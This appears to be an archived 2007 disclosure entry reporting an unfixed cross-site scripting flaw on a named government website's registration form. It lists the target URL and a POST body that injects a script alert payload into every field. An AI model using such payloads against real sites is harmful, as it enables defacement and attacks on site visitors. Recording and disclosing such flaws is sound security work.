www.wlga.gov.uk cross-site-scripting (XSS) Vulnerability

Advertisements:

Security researcher x2Fusion, has submitted on 03/09/2007 a cross-site-scripting (XSS) vulnerability affecting www.wlga.gov.uk, which at the time of submission ranked 5232691 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Date submitted: 03/09/2007

Date published: 07/09/2007

Fixed? Mail us!

Status:

UNFIXED

Author: x2Fusion

Domain: www.wlga.gov.uk

Category: XSS

Pagerank: 5232691

URL: http://www.wlga.gov.uk/content.php?nID=register;lID=1

POST: title=0&firstName=%22%3E%3Cscript%3Ealert%28%2FXSS+-+TheDefaced.org%2F%29%3C%2Fscript%3E%3Cp&lastNam e=%22%3E%3Cscript%3Ealert%28%2FXSS+-+TheDefaced.org%2F%29%3C%2Fscript%3E%3Cp&accountEmailAddress=%22 %3E%3Cscript%3Ealert%28%2FXSS+-+TheDefaced.org%2F%29%3C%2Fscript%3E%3Cp&organisation=%22%3E%3Cscript %3Ealert%28%2FXSS+-+TheDefaced.org%2F%29%3C%2Fscript%3E%3Cp&address1=%22%3E%3Cscript%3Ealert%28%2FXS S+-+TheDefaced.org%2F%29%3C%2Fscript%3E%3Cp&address2=%22%3E%3Cscript%3Ealert%28%2FXSS+-+TheDefaced.o rg%2F%29%3C%2Fscript%3E%3Cp&address3=%22%3E%3Cscript%3Ealert%28%2FXSS+-+TheDefaced.org%2F%29%3C%2Fsc ript%3E%3Cp&city=%22%3E%3Cscript%3Ealert%28%2FXSS+-+TheDefaced.org%2F%29%3C%2Fscript%3E%3Cp&state=%2 2%3E%3Cscript%3Ealert%28%2FXSS+-+TheDefaced.org%2F%29%3C%2Fscript%3E%3Cp&zip=%22%3E%3Cscript%3Ealert %28%2FXSS+-+TheDefaced.org%2F%29%3C%2Fscript%3E%3Cp&phone1=%22%3E%3Cscript%3Ealert%28%2FXSS+-+TheDef aced.org%2F%29%3C%2Fscript%3E%3Cp&phone3=%22%3E%3Cscript%3Ealert%28%2FXSS+-+TheDefaced.org%2F%29%3C% 2Fscript%3E%3Cp&fax=%22%3E%3Cscript%3Ealert%28%2FXSS+-+TheDefaced.org%2F%29%3C%2Fscript%3E%3Cp&Submi t=Submit

Click here to view the mirror

XSS Attacks
Cross Site Scripting Exploits and Defense

Website Fraud Loss Prevention